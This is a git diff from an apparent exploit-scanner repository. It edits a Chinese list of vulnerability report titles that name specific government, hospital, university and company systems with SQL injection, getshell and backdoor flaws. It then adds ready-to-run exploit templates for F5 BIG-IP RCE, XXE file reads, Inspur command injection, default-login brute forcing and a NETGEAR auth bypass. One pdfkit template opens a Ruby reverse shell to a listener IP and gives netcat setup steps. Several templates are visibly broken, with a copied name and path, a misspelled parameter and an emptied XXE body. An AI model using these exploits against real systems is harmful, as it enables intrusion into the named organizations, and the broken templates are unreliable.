内蒙古鸿茅健康大药房连锁有限责任公司 办公自动化系统注入导致超级管理员登录 @@ -40536,25 +40370,20 @@ zstu 北京蓝色光标品牌管理顾问股份有限公司 南京安与吉信息技术有限公司北京分公司 南昌市城市综合管理协调领导小组办公室 -博西家用电器(中国)有限公司版权所有 厦门大学-麦可思中国高等教育数据中心 厦门市建筑科学研究院集团股份有限公司 合肥周谷堆农产品批发市场股份有限公司 -同力天合(北京)管理软件股份有限公司 哈尔滨电气集团佳木斯电机股份有限公司 四川省中国青年旅行社有限公司云龙分社 四川省住房和城乡建设行业数据共享平台 -国信蓝桥教育科技(北京)股份有限公司 国家卫生计生委能力建设和继续教育中心 国家地质资料数据中心全国馆地质资料馆 国家广电总局广播电视卫星直播管理中心 国家测绘地理信息局第一地理信息制图院 -国家空气质量联网监测管理平台(南阳) 国药控股国大药房山西益源连锁有限公司 天津市启东金象大药房医药连锁有限公司 天津桂发祥十八街麻花食品股份有限公司 宁夏回族自治区农业综合项目开发办公室 -安徽安科生物工程(集团)股份有限公司 安徽省人社厅、安徽省人才服务中心网站 山东省人民政府驻北京办事处经济贸易处 山东省职业教育精品资源共享课建设系统 @@ -40579,11 +40408,9 @@ zstu 无锡线上线下通讯信息技术股份有限公司 日照市人民政府国有资产监督管理委员会 昆明中益信中小微企业金融服务有限公司 -昕薇在线(北京)数字传媒科技有限公司 桂林市工商局企业登记网上预约服务平台 武汉当代明诚文化体育集团股份有限公司 永城市社会信用体系建设领导小组办公室 -汇中普惠财富投资管理(北京)有限公司 江苏吴江中国东方丝绸市场股份有限公司 江苏大圆银泰商品合约交易市场有限公司 江苏安靠智能输电工程科技股份有限公司 @@ -40598,6 +40425,7 @@ zstu 洛阳市人民政府国有资产监督管理委员会 浙江大学医学院附属医院【邵逸夫医院】 浙江杭州余杭农村商业银行股份有限公司 +浙江省台州市政府中外专利信息服务平台 浙江省杭州市西湖区教育信息与装备中心 海南中小企业发展专项资金申报管理系统 海南海航基础设施投资集团股份有限公司 @@ -40611,7 +40439,6 @@ zstu 深圳市捷佳伟创新能源装备股份有限公司 深圳市新产业生物医学工程股份有限公司 深圳市新城市规划建筑设计股份有限公司 -深圳市景田食品饮料有限公司(百岁山) 深圳市海目星激光智能装备股份有限公司 深圳市深港机动车驾驶培训集团有限公司 温州市冠盛汽车零部件集团股份有限公司 @@ -40621,10 +40448,8 @@ zstu 湖北省铁路护路联防工作领导小组办公室 湖南天润数字娱乐文化传媒股份有限公司 湘西土家族苗族自治州科技项目申报系统 -濮阳濮耐高温材料(集团)股份有限公司 -环球时报在线(北京)文化传播有限公司 珠海恒基达鑫国际化工仓储股份有限公司 -腕表时代(北京兰会时光科技有限公司) +肇庆市高要区人民法院网上诉讼服务平台 芜湖三七互娱网络科技集团股份有限公司 芜湖顺荣三七互娱网络科技股份有限公司 苏州市中小学家庭教育课程项目管理平台 @@ -40632,17 +40457,13 @@ zstu 苏州市食用农产品市场销售质量安全监管 莒县房产管理局商品房合同网上备案系统 营口市人民政府国有资产监督管理委员会 -西安曲江文化产业投资(集团)有限公司 辽宁省建筑市场监管与诚信信息管理平台 辽宁省社会信用体系建设领导小组办公室 -通樱信息科技(中国)有限公司版权所有 通用学习管理系统一处任意文件上传漏洞 重庆市江北区企业信用体系建设领导小组 金华市锦程人才服务有限公司嵊州分公司 长沙市旅游局网络智能办公系统上传漏洞 阜阳师范学院校园网站新闻发布平台登录 -陕西文化产业投资控股(集团)有限公司 -青岛城市建设投资(集团)有限责任公司 青岛市应急管理局第一响应人培训云平台 青岛市建设市场监管与信用信息综合平台 马鞍山经济技术开发区卸巷社区综合平台 @@ -40652,10 +40473,6 @@ zstu 黑龙江国土资源厅驻森工总局国土资源局 黑龙江省哈尔滨市住房保障和房产管理局 黑龙江省工业和信息化委员会中小企业局 -浙江省台州市政府中外专利信息服务平台 -肇庆市高要区人民法院网上诉讼服务平台 -中共重庆市九龙坡区委宣传部(九龙报社)某记者网 -上海远丰信息科技(集团)有限公司电商B2B程序存在高危漏洞01 大型仪器开放共享管理平台任意文件上传GetShell 江泰保险经纪股份有限公司案件系统存在SQLl注入漏洞 海南创想未来文化传媒有限公司存在多处SQL注入 @@ -40675,7 +40492,6 @@ zstu 中共北京市西城区委新街口街道工作委员会 中共成都市青羊区党员干部现代远程教育网 中共滨州市沾化区委、沾化区人民政府网站 -中共重庆市九龙坡区委宣传部(九龙报社) 中南科技深圳信息技术有限公司合肥分公司 中国中铁四局集团城市轨道交通工程分公司 中国人民政治协商会议北京市房山区委员会 @@ -40690,20 +40506,19 @@ zstu 中国人民政治协商会议达州市委员会办公室 中国人民政治协商会议青岛市李沧区委员会 中国信息通信研究院技术与通信标准研究所 -中国国际海运集装箱(集团)股份有限公司 中国地质调查局国土资源实物地质资料中心 中国检验检疫局湖北国际旅行卫生保健中心 中国民用航空中南地区管理局机关服务中心 -中国气象局综合观测培训实习基地(南京) 中国水产流通与加工协会海洋捕捞申报系统 中国电建集团华东勘测设计研究院有限公司 中国科学院青藏高原冰冻圈观测试验研究站 中国移动通信集团浙江有限公司信息安全部 中国联合网络通信有限公司双鸭山市分公司 +中国自由贸易试验区川南临港片区中介超市 中国软件与技术服务股份有限公司税务本部 仲恺高新区住宅专项维修资金公众服务平台 -优慕课在线教育科技(北京)有限责任公司 佛山市人力资源和社会保障局公共服务平台 +信呼协同办公系统普通账号执行管理员操作 全国高等学校学生信息咨询与就业指导中心 内蒙古杭锦后旗农牧业公共信息综合服务网 北京三联虹普新合纤技术服务股份有限公司 @@ -40714,19 +40529,17 @@ zstu 北京火币天下网络技术有限公司深圳分公司 北京贰零四玖云计算数据技术服务有限公司 北京达因军惠网络技术有限公司柳州分公司 -华为公共云服务(华为软件技术有限公司) 南京大学环境规划设计研究院集团股份公司 合肥广杰网络信息技术有限公司你我招聘网 咸宁市人民政府政务服务中心服务审批系统 哈尔滨工大高新技术产业开发股份有限公司 四川省交通运输厅公路规划勘察设计研究院 -国家级(眉县)猕猴桃产业园区管理委员会 +国家测绘地理信息局四川基础地理信息中心 大丰市党员干部现代远程教育综合服务平台 大连市建筑工程质量信息化数字化监管系统 天津市农村工作委员会农业机械管理办公室 安徽省交通规划设计研究总院股份有限公司 宝创另一网关产品存在注入与任意文件遍历 -小狗电器互联网科技(北京)股份有限公司 帕拉迪堡垒机某处逻辑漏洞导致一系列问题 常州市金坛区公安局印章备案入网查询系统 广东省农业科学院蚕业与农产品加工研究所 @@ -40734,6 +40547,7 @@ zstu 广州市工业和信息化发展专项资金管理系统 广西壮族自治区环境空气质量监测管理系统 建湖县党员干部现代远程教育综合服务平台 +微知库旗下九江职业技术学院存在越权漏洞 德清县人力资源和社会保障网网上办事大厅 忻州市排污单位自行监测信息实时发布平台 恒泰艾普石油天然气技术服务股份有限公司 @@ -40758,11 +40572,8 @@ zstu 浙江省交通投资集团有限公司杭金衢分公司 深圳前海华人互联网金融服务集团有限公司 湖北省建筑市场监督与诚信一体化工作平台 -百世店加科技(杭州)有限公司上海分公司 直接通过连接即可进入中关村后台评论管理 福建省疾病预防控制中心海峡预防医学杂志 -米勒贝姆振动与声学系统(北京)有限公司 -美利达自行车(中国)有限公司上海分公司 考生之家某人事系统一处任意文件下载漏洞 苏州中德宏泰电子科技有限公司成都分公司 苏州市世界文化遗产古典园林保护监督中心 @@ -40770,31 +40581,27 @@ zstu 西双版纳傣族自治州交通运输局——弱口令 西安曲江大明宫国家遗址公园管理有限公司 西安派瑞功率半导体变流技术股份有限公司 -远光能源互联网产业发展(横琴)有限公司 连云港市人民政府国有资产监督管理委员会 陕西省住房和城乡建设厅执业资格注册中心 -黄河水利水电开发总公司(小浪底建管局) 黑龙江省佳木斯市汤原县网上政务服务中心 黑龙江省农业科学院农产品质量安全研究所 黑龙江省大兴安岭地区行政公署科学技术局 黑龙江省黑河市人民政府网上政务服务中心 齐博博客系统最新版前台某处文件包含漏洞 中共滨州市沾化区委、沾化区人民政府主办 沾化区政府办公室 -国家测绘地理信息局四川基础地理信息中心(国家测绘地理信息局四川测绘资料档案馆) 天地心内容管理系统存在任意文件操作漏洞,可getshell -微知库旗下九江职业技术学院存在越权漏洞/越权查看他人信息 易贝云网站管理系统前台存在代码执行漏洞1 易贝云网站管理系统前台存在代码执行漏洞2 深圳市博思协创网络科技有限公司开源办公OA系统高危逻辑漏洞 东莞市光速网络技术有限公司建站系统存在SQL注入 中交隧道工程局有限公司协同办公系统多处SQL注入 +北京全程软件有限公司云平台客户管理系统SQL注入 南京水利科学研究院信息自动测报系统存在SQL注入 深圳市卓越迈创企业形象设计有限公司存在SQL注入 阜阳协程信息多个旅游建站系统存在通用型SQL注入 -北京全程软件有限公司云平台客户管理系统SQL注入2(官方demo) -北京全程软件有限公司云平台客户管理系统SQL注入(官方demo) +北京全程软件有限公司云平台客户管理系统SQL注入2 +北京全程软件有限公司云平台全部系统上传getshell 通用型监控综合管理系统任意文件上传漏洞getshell -北京全程软件有限公司云平台全部系统上传getshell(官方demo) 东莞市光速网络技术有限公司网站管理系统product.php存在SQL注入 郑州桐源计算机科技有限公司网站管理系统shownews.asp存在SQL注入 长沙泽帆网络科技有限公司建站系统通用型sql注入 @@ -40803,25 +40610,20 @@ zstu 上海复博农业科技有限公司某产品系统一处webservice注入3# 上海市商务委员会财政资金支持项目管理系统 上海金吉鸟企业投资管理有限公司南京分公司 -东营建设信息网(东营市住房和城乡建设局) 中共自贡市自流井区纪委自流井区监察委员会 -中共鸡西市纪律检查委员会(鸡西市监察局) 中国人民政治协商会议重庆市沙坪坝区委员会 中国人民政治协商会议黑龙江省大庆市委员会 中国人民解放军第二零二医院网上预约挂号网 -中国副食品批发网(义务华品商贸有限公司) 中国地质科学院地球物理地球化学勘查研究所 中国能建西北电力建设第四工程有限公司门户 中国能源建设集团沈阳电力机械总厂有限公司 中国能源建设集团湖南省电力设计院有限公司 -伊春市农产品(森林食品)质量安全追溯平台 信呼协同办公系统二次注入导致任意文件删除 全媒体内容管理及业务支持平台存在逻辑漏洞 北京中公未来教育咨询有限公司黑龙江分公司 北京华谊嘉信整合营销顾问集团股份有限公司 北京大学中国高等教育文献保障系统管理中心 北大国际医院集团西南合成制药股份有限公司 -南京脑科医院(南京医科大学附属脑科医院) 四川省卫生统计数据综合采集与决策支持系统 四川省政府政务服务和公共资源交易服务中心 天津市市场监督管理委员会企业名称申报平台 @@ -40830,7 +40632,6 @@ zstu 广西壮族自治区梧州市蒙山县人民政府办公室 广西壮族自治区社会保险事业局网上服务平台 延边州政府部门权力清单和责任清单公开系统 -支付宝(中国)网络技术有限公司成都分公司 政协柞水县委员会门户网站——在线提案系统 日照市深化医药卫生体制改革领导小组办公室 昆山经济技术开发区建设工程质量安全监督站 @@ -40839,7 +40640,6 @@ zstu 江西省瑞金市干群“连心”精准扶贫网络平台 河北省科技型中小企业技术创新资金管理中心 河北网嘉招标公共服务平台运营服务有限公司 -河南省周口市行政服务(公共资源交易)中心 海南师范大学大学生心理健康教育与咨询中心 深圳市云端传奇信息技术有限公司武汉分公司 温州市行政审批与公共资源交易服务管理中心 @@ -40847,6 +40647,7 @@ zstu 网络研修社区逻辑漏洞——任意用户密码重置 舟山市建筑工程质量安全监督站检验测试中心 荆门市东宝区龙泉街道土门巷社区居民委员会 +衡阳师范学院行政办公系统任意用户密码重置 西安阎良国家航空高技术产业基地管理委员会 贵州省交通规划勘察设计研究院股份有限公司 贵州省人民政府门户网站运行协调管理办公室 @@ -40859,7 +40660,6 @@ zstu 易透網資訊開發有限公司建站系统存在通用型SQL注入漏洞 北京经纬中天信息技术有限公司新闻媒体系统SQL注入漏洞4 深圳同天下科技有限公司系列建站存在储存型XSS -信呼协同办公系统普通账号执行管理员操作(demo复现) 合协人力资源平台系统存在隐藏注册页面,可getshell 创文图书馆电子资源综合管理与利用系统存在sql注入漏洞 中国市与美国芝加哥市贸易投资合作联合工作组 @@ -40880,7 +40680,6 @@ zstu 广西壮族自治区工业和信息化委员会政务信息网 新疆维吾尔自治区人力资源和社会保障信息中心 新疆维吾尔自治区博尔塔拉自治州温泉县政务网 -某智能网关系统任意文件删除漏洞(无需登录) 毕节市行政执法‘三项制度’试点工作信息平台 沈阳经济技术开发区安全生产综合监管信息平台 河南省建筑市场监管信息系统暨一体化工作平台 @@ -40904,7 +40703,6 @@ zstu 长春凌展软件旗下高校教务管理系统存在通用型SQL注入漏洞 北京美络克思科技有限公司管理系统某处可执行sql明文代码 天津市先特网络科技有限公司网上商城系统存在sql注入漏洞 -北京美络克思科技有限公司管理系统某处可执行sql明文代码(不同 上海复博农业科技有限公司某产品登录平台一处webservicel注入漏洞1# 上海复博农业科技有限公司某产品登录平台一处webservice设计不当可获取所有用户帐号密码进后台 中共浙江盘石信息技术股份有限公司党建管理平台 @@ -40914,22 +40712,17 @@ zstu 中国科学院地理科学与资源研究所环境考古实验室 中国能源建设集团安徽电力建设第二工程有限公司 中国能源建设集团广东省电力设计研究院有限公司 -中国(辽宁)自由贸易试验区营口片区管理委员会 佛山市顺德区餐饮油烟废气排放在线监控系统平台 北京港经通经济信息咨询服务有限公司上海分公司 北京起步科技股份有限公司项目管理系统漏洞打包 华中农业大学作物遗传改良国家重点实验室棉花组 四平市安全生产监督管理局行政审批网上申报系统 国家食品安全技术资源调查管理系统后台管理系统 -宁波市镇海区新闻中心(宁波市镇海广播电视台) -山西省公共资源交易中心(山西省政务服务中心) 广州白云山医药集团股份有限公司白云山制药总厂 -某智能网关系统任意文件上传洞漏洞(无需登录) 河南省人力资源和社会保障厅专业技术人员管理处 海南经贸职业技术学院图书馆人脸识别弱口令漏洞 湖南省重点营运车辆动态信息公共监管与服务平台 秦安县工程建设领域项目和信用信息公开共享专栏 -辽宁经济管理干部学院(辽宁经济职业技术学院) 黑龙江省软件与信息服务业协会双软评估申报系统 黑龙江省镜泊湖风景名胜区自然保护区管理委员会 黑龙江省黑河市嫩江县人民政府网上政务服务中心 @@ -40941,6 +40734,7 @@ zstu 上海市施工现场安全生产保证体系第一审核认证中心 中国船舶重工集团应急预警与救援装备股份有限公司 中国船舶重工集团海洋防务与信息对抗股份有限公司 +云南生物谷药业股份有限公司存在任意文件下载漏洞 云金地国土资源网上交易系统存在任意文件读取漏洞 全国高等学历继续教育专业管理和公共信息服务平台 安徽省住房和城乡建设厅城乡规划建设综合管理平台 @@ -40948,17 +40742,13 @@ zstu 慧教云教育资源公共服务平台存在任意文件上传漏洞 慧教云教育资源公共服务平台存在任意文件读取漏洞 深圳同天下科技有限公司存在两处逻辑越权操作打包 -航天万源实业公司(中国航天科技集团公司子公司) 重庆市农业综合开发土地治理项目造价审核管理系统 -云南生物谷药业股份有限公司存在任意文件下载漏洞(修改) 慧教云教育资源公共服务平台存在任意文件上传漏洞2 慧教云教育资源公共服务平台存在任意文件上传漏洞3 北京联达动力协同办公管理平台多个版本存在通用型SQL注入漏洞 石家庄博士德软件多个汽车行业管理软件存在通用型SQL注入漏洞 公安消防局通用性社会单位消防安全户籍化管理系统sql注入 上海市高校生涯发展及实践基地一体化云服务管理平台 -中国(四川)自由贸易试验区川南临港片区管理委员会 -中国(辽宁)自由贸易试验区营口片区管理委员会网站 信息产业电子第十一设计研究院科技工程股份有限公司 全国公安机关爆炸物品安全监管民警教育训练信息平台 北京经纬中天信息公司媒体内容管理平台任意文件下载 @@ -40968,17 +40758,16 @@ zstu 国家行政学院电子政务研究中心省级政府网上服务网站 普洱市就业和人才服务高校毕业生档案归属地查询系统 河北省食品药品监督管理局餐饮服务许可审批监管系统 -衡阳师范学院行政办公系统任意用户密码重置(秒改) 谷昆学校网站管理软件漏洞打包,可组合漏洞进行攻击 重庆市交通运输统计分析监测和投资计划管理信息系统 重庆市水利工程建设领域项目信息公开及诚信体系专栏 北京美络克思科技有限公司档案资源智能管理系统前台GETSHELL -重庆汉沙科技有限公司建站程序存在文件包含,可前台getshell(大量实例) +重庆汉沙科技有限公司建站程序存在文件包含,可前台getshell 中华人民共和国国家邮政局快递行业信用信息系统存在sql注入 北京中核华辉科技发展有限公司项目管理信息系统一处sql注入 北京中核华辉科技发展有限公司项目管理系统某处存在sql注入 北京中核华辉科技发展有限公司项目管理信息系统一处union注入漏洞 -全国民办高校学生信息公共查询平台(民学网)官方网站 +中共黑龙江省委非公有制经济组织和社会组织工作委员会 慧教云教育资源公共服务平台系统存在任意代码执行漏洞 江苏省下属多个卫生管理平台存在命令执行漏洞【更新】 海丰县公共资源交易中心土地与矿业权网上挂牌交易系统 @@ -40990,7 +40779,6 @@ zstu 深圳市博思协创网络科技有限公司企业协同管理系统后台XSS 北京经纬中天信息技术有限公司新闻媒体系统前台一步步getshell 中国能源建设集团西北电力建设工程有限公司第四工程公司 -中英合作采购专业专业自考网(中国采购职业资格认证网) 广州市海珠区市场和质量监督管理局消费投诉公示试点平台 深圳神州通达网络技术有限公司网站管理系统存在显错注入 湖北省人文社科重点研究基地影视文化与产业发展研究中心 @@ -41003,27 +40791,18 @@ zstu 北京中核华辉科技发展有限公司项目管理信息系统存在一处sql注入漏洞 北京中核华辉科技发展有限公司项目管理信息系统存在一处sql注入漏洞#1 北京美络克思科技有限公司档案资源智能管理系统一处前台webservice注入 -中国聋儿康复研究中心(中国残疾人联合会听力语言康复中心 内蒙古伊东煤炭集团有限责任公司东兴化工无人值守管理系统 广东省三资管理服务平台存在任意文件上传漏洞全省信息泄露 易软天创然之协同系统和喧喧及时通信软件远程命令执行漏洞 +武汉风云马文化传播有限责任公司旗下武汉美食媒体门户网站 辽宁畅通数据通信有限公司网站群系统存在任意文件下载漏洞 深圳易网时代信息技术有限公司快速开发平台企业正式版存在SQL注入漏洞 -郑州航空港经济综合实验区(郑州新郑综合保税区)管理委员会 上海复博农业科技有限公司产品监控信息系统一处任意文件上传getshell#1 -南京二进制软件有限公司协同运营管理平台逻辑漏洞可任意执行sql(需要登录,demo演示,已补充) +南京二进制软件有限公司协同运营管理平台逻辑漏洞可任意执行sql 中共滨州市沾化区委、沾化区人民政府主办沾化区政府办公室网站 安龙县人口与计划生育局计生业务应用平台孕前优生数据上传系统 上海复博农业科技有限公司某产品登录平台一处前台任意文件上传getshell 北京讯飞乐知行软件有限公司存在通用漏洞泄露六百万师生敏感数据 -青岛市电子政务和信息资源管理办公室(青岛市大数据发展促进局) -上海复博农业科技有限公司某产品监控信息系统一处任意文件下载漏洞1# -上海复博农业科技有限公司某产品监控信息系统一处任意文件下载漏洞2# 北京宽广智通信息技术有限公司企智通企业操作员登录页面存在通用注入 -厂商云服务端通信加密认证简单,无权限认证,导致全线产品被任意控制 -符号云存在文件泄露及官方后门,可以管理员身份登陆管理任意商户后台 -国家林业局湿地保护管理中心(中华人民共和国国际湿地公约履约办公室) 广西河池市住房保障和房产管理局住房管理信息系统后台弱口令导致信息泄露 -武汉风云马文化传播有限责任公司旗下武汉美食媒体门户网站:好吃佬美食网 -中共黑龙江省委组织部(中共黑龙江省委非公有制经济组织和社会组织工作委员会) -北京美络克思科技有限公司档案资源智能管理系统前台直接获取所有用户帐号密码(3处打包) +北京美络克思科技有限公司档案资源智能管理系统前台直接获取所有用户帐号密码 diff --git a/config/51pwn/CVE-2022-1388.yaml b/config/51pwn/CVE-2022-1388.yaml index d56a8d642..0595cf8f6 100644 --- a/config/51pwn/CVE-2022-1388.yaml +++ b/config/51pwn/CVE-2022-1388.yaml @@ -25,13 +25,14 @@ info: tags: bigip,cve,cve2022,rce,mirai variables: +# admin:horizon3 auth: "admin:" requests: - raw: - | POST /mgmt/tm/util/bash HTTP/1.1 - Host: {{Hostname}} + Host: 127.0.0.1 Connection: Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host X-F5-Auth-Token: a Authorization: Basic {{base64(auth)}} diff --git a/config/51pwn/CVE-2022-2414.yaml b/config/51pwn/CVE-2022-2414.yaml new file mode 100644 index 000000000..df6126ce6 --- /dev/null +++ b/config/51pwn/CVE-2022-2414.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-2414_51pwn_api +info: + name: CVE-2022-2414_51pwn_api + author: + - 51pwn + severity: Critical + description: |- + A flaw was found in pki-core. Access to external entities when parsing XML documents + can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. + https://nvd.nist.gov/vuln/detail/CVE-2022-2414 + https://access.redhat.com/security/cve/CVE-2022-2414 + tags: api,web,xxe +requests: + - raw: + - | + POST /ca/rest/certrequests HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + ]> + + + &ent; + + matchers: + - type: word + condition: and + part: body + words: + - 'root:*:0:0:' + matchers-condition: and + redirects: false + \ No newline at end of file diff --git a/config/51pwn/CVE-2022-25765.yaml b/config/51pwn/CVE-2022-25765.yaml new file mode 100644 index 000000000..2a81c95c0 --- /dev/null +++ b/config/51pwn/CVE-2022-25765.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-25765_51pwn_api +info: + name: CVE-2022-2414_51pwn_api + author: + - 51pwn + severity: Critical + description: |- + pdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. + (Tested on ver 0.8.6) - CVE-2022-25765 + Pre-reqs: + + Setup HTTP Server - python3 -m http.server + Setup Netcat Listener - nc -lvnp 4444 + Reverse Ruby Shell via webpage: http://LOCAL-IP:LOCAL-HTTP-PORT/?name=%20` ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("LOCAL-IP",LOCAL-LISTEN-PORT))') + + Via CURL (modify bold values): curl 'TARGET-URL' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: TARGET_URL' -H 'Connection: keep-alive' -H 'Referer: TARGET_URL' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2FLOCAL-IP%3ALOCAL-HTTP-PORT%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22LOCAL-IP%22%2CLOCAL-LISTEN-PORT%29%29%27%60' + tags: api,web,pdf + +variables: + MyIp: 169.254.254.254 + MyPort: 4444 +requests: + - raw: + - | + POST /ca/rest/certrequests HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Upgrade-Insecure-Requests: 1 + Connection: keep-alive + + rl=http%3A%2F%2F{{MyIp}}%3A{{MyPort}}%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22{{MyIp}}%22%2C{{MyPort}}%29%29%27%60 + + matchers: + - type: word + condition: and + part: body + words: + - 'root:*:0:0:' + matchers-condition: and + redirects: false + \ No newline at end of file diff --git a/config/51pwn/yaml/ H5S CONSOLE/CNVD-2020-67113.yaml b/config/51pwn/yaml/ H5S CONSOLE/CNVD-2020-67113.yaml new file mode 100755 index 000000000..ba18af6d3 --- /dev/null +++ b/config/51pwn/yaml/ H5S CONSOLE/CNVD-2020-67113.yaml @@ -0,0 +1,51 @@ +id: CNVD-2020-67113 +info: + name: H5S CONSOLE Unauthorized Access Vulnerability (CNVD-2020-67113) + author: + - l0ne1y + description: |- + 零视技术(上海)有限公司H5S CONSOLE 未授权访问漏洞 + 零视技术(上海)有限公司是以领先的视频技术服务于客户,致力于物联网视频开发简单化,依托于HTML5 WebRTC 等新的技术,实现全平台视频播放简单化。 + + 零视技术(上海)有限公司H5S CONSOLE存在未授权访问漏洞。攻击者可利用漏洞访问后台相应端口,执行未授权操作。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://linkingvision.cn/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - strUser + - strPasswd + - type: word + condition: or + part: body + words: + - H5_AUTO + - H5_DEV + - type: word + part: header + words: + - application/json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/api/v1/GetSrc' + - '{{BaseURL}}/api/v1/GetDevice' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/ Inspur ClusterEngine/CVE-2020-21224.yaml b/config/51pwn/yaml/ Inspur ClusterEngine/CVE-2020-21224.yaml new file mode 100755 index 000000000..d6633da0d --- /dev/null +++ b/config/51pwn/yaml/ Inspur ClusterEngine/CVE-2020-21224.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-21224 +info: + name: Inspur ClusterEngine 4.0 - Remote Code Execution + author: + - l0ne1y + description: |- + Inspur Clusterengine v4 login 远程命令执行漏洞 + + 浪潮 Inspur ClusterEngine是中国浪潮公司的一个应用软件。提供管理集群系统中软硬件提交的作业。 + + Inspur ClusterEngine V4.0 存在安全漏洞,远程攻击者可利用该漏洞可以向控制服务器发送恶意登录报文。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.inspur.com/lcjtww/psirt/security-advisories/2485095/index.html + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。' +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/login' + method: POST + body: | + op=login&username=;`cat /etc/passwd`&password= + headers: + Content-Type: application/x-www-form-urlencoded + Referer: '{{Hostname}}/module/login/login.html' diff --git a/config/51pwn/yaml/ Inspur ClusterEngine/inspur-clusterengine-default-login.yaml b/config/51pwn/yaml/ Inspur ClusterEngine/inspur-clusterengine-default-login.yaml new file mode 100755 index 000000000..f370e2f91 --- /dev/null +++ b/config/51pwn/yaml/ Inspur ClusterEngine/inspur-clusterengine-default-login.yaml @@ -0,0 +1,46 @@ +id: inspur-clusterengine-default-login +info: + name: Inspur Clusterengine V4 Default Login + author: + - l0ne1y + description: |- + Inspur Clusterengine默认账号密码 + 浪潮 Inspur ClusterEngine是中国浪潮公司的一个应用软件。提供管理集群系统中软硬件提交的作业。 + 因安全配置错误,Inspur ClusterEngine 存在默认账号密码。 + severity: high + remediation: |- + 1、配置所有的安全机制 + 2、最小原则,关掉或限制不使用的服务 + 3、更改默认账户信息 + 4、使用日志和警报 + 5、回显信息不显示任何与实际错误相关的信息 + 6、检查和修复安全配置项 +requests: +- matchers: + - type: word + part: body + words: + - '"exitcode":0' + - type: word + condition: and + part: header + words: + - username=admin|pwd + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + + op=login&username={{username}}&password={{password}} + attack: pitchfork + payloads: + password: + - 123456 + username: + - admin|pwd + max-redirects: 2 + redirects: true diff --git a/config/51pwn/yaml/ NETGEAR DGN2200v1/netgear-router-auth-bypass.yaml b/config/51pwn/yaml/ NETGEAR DGN2200v1/netgear-router-auth-bypass.yaml new file mode 100755 index 000000000..46d6671db --- /dev/null +++ b/config/51pwn/yaml/ NETGEAR DGN2200v1/netgear-router-auth-bypass.yaml @@ -0,0 +1,38 @@ +id: netgear-router-auth-bypass +info: + name: NETGEAR DGN2200v1 Router Authentication Bypass + author: + - l0ne1y + tags: + - netgear + - auth-bypass + - router + description: |- + NETGEAR DGN2200v1 路由器身份验证绕过漏洞 + NETGEAR DGN2200v1是一款N300无线ADSL2+调制解调器路由器。 + 如果页面具有“.jpg”、“.gif”或“ess_”等字符串,NETGEAR DGN2200v1 路由器不需要身份验证就可以访问设备上的任何页面,包括那些需要身份验证的。 + reference: + - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ + - 